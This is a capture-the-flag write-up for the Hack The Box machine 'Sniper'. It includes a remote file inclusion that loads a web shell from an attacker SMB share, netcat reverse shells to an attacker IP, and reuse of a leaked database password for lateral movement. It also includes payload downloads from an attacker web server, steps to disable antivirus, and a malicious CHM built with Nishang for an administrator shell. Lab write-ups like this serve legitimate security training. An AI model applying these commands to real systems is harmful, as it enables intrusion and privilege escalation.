Posts Hack The Box - Sniper Writeup
Post
Cancel

Hack The Box - Sniper Writeup

Nmap

1
nmap -sC -sV -oA nmap -v 10.10.10.151

Output

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 04:49 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating Ping Scan at 04:49
Scanning 10.10.10.151 [2 ports]
Completed Ping Scan at 04:49, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:49
Completed Parallel DNS resolution of 1 host. at 04:49, 0.03s elapsed
Initiating Connect Scan at 04:49
Scanning 10.10.10.151 [1000 ports]
Discovered open port 445/tcp on 10.10.10.151
Discovered open port 135/tcp on 10.10.10.151
Discovered open port 80/tcp on 10.10.10.151
Discovered open port 139/tcp on 10.10.10.151
Completed Connect Scan at 04:49, 4.94s elapsed (1000 total ports)
Initiating Service scan at 04:49
Scanning 4 services on 10.10.10.151
Completed Service scan at 04:49, 7.20s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.151.
Initiating NSE at 04:49
Completed NSE at 04:49, 40.08s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.09s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Nmap scan report for 10.10.10.151
Host is up (0.021s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0                                                                                                          
|_http-title: Sniper Co.                                                                                                                          
135/tcp open  msrpc         Microsoft Windows RPC                                                                                                 
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                         
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-20T15:49:20
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.88 seconds

From this scan we can see we have a windows OS with a web server.

HTTP

Browsing through the pages on the web server we find a blog page with the ability to change the language. Upon changing the language we see a GET request in the URL for a .php file. This allows for a Local File Inclusion exploit.

LFI/RFI Exploit

For this exploit we are going to host a web shell on an SMB server on our own machine and pass the share to the website to include the webshell to allow code execution.

Setting up an SMB Share

To setup our SMB share we need to first to create a folder to host our files. I have used mkdir /mnt/smb_share for my configuration. We then need to edit our /etc/samba/smb.conf file to setup a public share.

Remove all of the contents of the file and replace them with the configuration below.

smb.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[share]
path = /mnt/smb_share
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Restart SMB Serivce

Restart the SMB service to load our new configuration file by running sudo service smbd restart.

We can quickly test if this works by running smbclient -L <IP Address> and entering nothing for password. This should give the output below.

>Sharename Type Comment --------- ---- ------- share Disk IPC$ IPC IPC Service (Samba Server 4.11.5-Debian) SMB1 disabled -- no workgroup available

Web Shell and Reverse Shell

Now that we have our Samba server setup we need to obtain our web shell and a netcat executable that can be uploaded and not be detected by an antivirus program.

Download both of these files and place them in our samba mount folder.

With the files downloaded we can now load our web shell by navigating to http://10.10.10.151/blog/?lang=\\<ATTACK IP ADDRESS>\share\webshell.php. Replacing <ATTACK IP ADDRESS> with your IP address.

Now that we have a web shell we can get our reverse shell by doing the following.

Create a working folder

  • Set CWD to C:\
  • Set Cmd to mkdir temp
  • Pressing Execute

Upload nc.exe

  • Set CWD to C:\temp
  • Press browse and select our nc.exe file

Executing reverse shell

  • Open a terminal session and run nc -nvlp 1234
  • Set CWD to C:\temp
  • Set Cmd to nc.exe <ATTACK IP ADDRESS> 1234 -e powershell.exe replacing <ATTACK IP ADDRESS> with your IP address.
  • Pressing Execute

Out terminal should now begin a poweshell session as the user iusr.

Escalating to user

Browsing through the website files in the terminal we come across a db.php file which contains MySQL credentials. We find the password 36mEAhz/B8xQ~2VM

Now that we have a password. We can see from the Users folder that there is a single user on this box. Sometimes Administrators are lazy and reuse the same password. So lets try and switch to the user Chris.

Set Powershell variables

  • $password = "36mEAhz/B8xQ~2VM" | COnvertTo-SecureString -asPlainText -Force
  • $username = "nt authority\Chris"
  • $credential = New-Object System.Management.Automation.PsCredential($username,$password)

Download netcat as Chris

  • Open a new terminal session
  • cd to our smb mount folder
  • Start a Python Web server with python -m SimpleHTTPServer
  • Download our nc.exe binary as with Invoke-Command -ComputerName sniper -Credential $credential -Scriptblock { IWR -uri <ATTACK IP ADDRESS>:8000/nc.exe -outfile nc.exe } replacing <ATTACK IP ADDRESS with your IP address.

Execute reverse shell as Chris

  • Open a new terminal session
  • Start a netcat listener with nc -nvlp 4455
  • Launch nc.exe as Chris in our existing powershell with Invoke-Command -ComputerName sniper -Credential $credential -Scriptblock { cmd /c nc.exe <ATTACK IP ADDRESS> 4455 -e powershell.exe } replacing <ATTACK IP ADDRESS> with your IP address.

This should pop a reverse Powershell session as the user Chris and we can find the user.txt file in the Desktop folder for the user.

Escalating to root

Now that we have user we can begin to find our path to root.

In the Downloads folder we can see there is an instructions.chm file. Which looks like documentation for an app the user is supposed to be writing.

We can see in C:\Docs folder there is a note.txt file.

note.txt

1
2
3
4
5
Hi Chris,
        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

From this note we can see that the CEO of the company is looking for an application documentation file and will look for it in this folder. This is a hint that our exploit is via the .chm file.

chm exploit

Now that we know our attack we can create our file with a payload. To do this there is a few steps required to setup the creation of our exploit.

This exploit must be created from a windows OS!!!

Download these applications

Install Microsoft HTML Help Workshop

  • Launch the executable and follow the steps

Nishang setup

  • Disable all anti virus software
  • Extract the folder to the C drive in a folder named nishang
  • Launch a Powershell session as Administrator
  • Allow Script execution with Set-ExecutionPolicy Unrestricted
  • Prevent Windows Defender stopping file execution with Get-ChildItem -Path 'C:\nishang\' | Unblock-Files
  • cd into the nishang folder
  • Import the powershell modules with Import-Module .\nishang.psm1

We should now have nishang installed. We can check this by running Get-Command -Module nishang. Running this should show various modules included with nishang. Ensure that you see a line stating Function Out-CHM 0.0 nishang as this is the module we will be using for this exploit.

Creating a doc.chm with payload

Since we already have netcat on the box we can create a simple payload to execute nc.exe as Administrator.

1
2
3
4
`Out-CHM -Payload "C:\temp\nc.exe <ATTACK IP ADDRESS> 4466 -e powershell.exe" -HHCPath 'C:\Program Files (x86)\HTML Help Workshop'


Replace <ATTACK IP ADDRESS> with your IP address

This command will create our doc.chm file.

Copy this file back over to our attacking machine and place it in the folder we used for our smb share and python web server. If you have stopped your python web server start it again with python -m SimpleHTTPServer.

Copy doc.chm to the box

with our python web server running. Back in our powershell session as the user Chris set the working directory to C:\Docs and run IWR -uri <ATTACK IP ADDRESS>:8000/doc.chm -outfile doc.chm replacing <ATTACK IP ADDRESS> with your IP address to download the doc.chm file to the box.

Administrator Shell

Now that we have the doc.chm file in the folder we can open another terminal session and start another netcat listener with nc -nvlp 4466 and wait for the Administrator to open the file and trigger our exploit.

After a few seconds the exploit will be triggered and we now have a reverse powershell with Administrator privileges. The root.txt can be found in the Desktop folder of Administrator.

If you found this writeup useful I would appreciate if you could respect me on HackTheBox.eu. My profile can be found here!

This post is licensed under CC BY 4.0 by the author.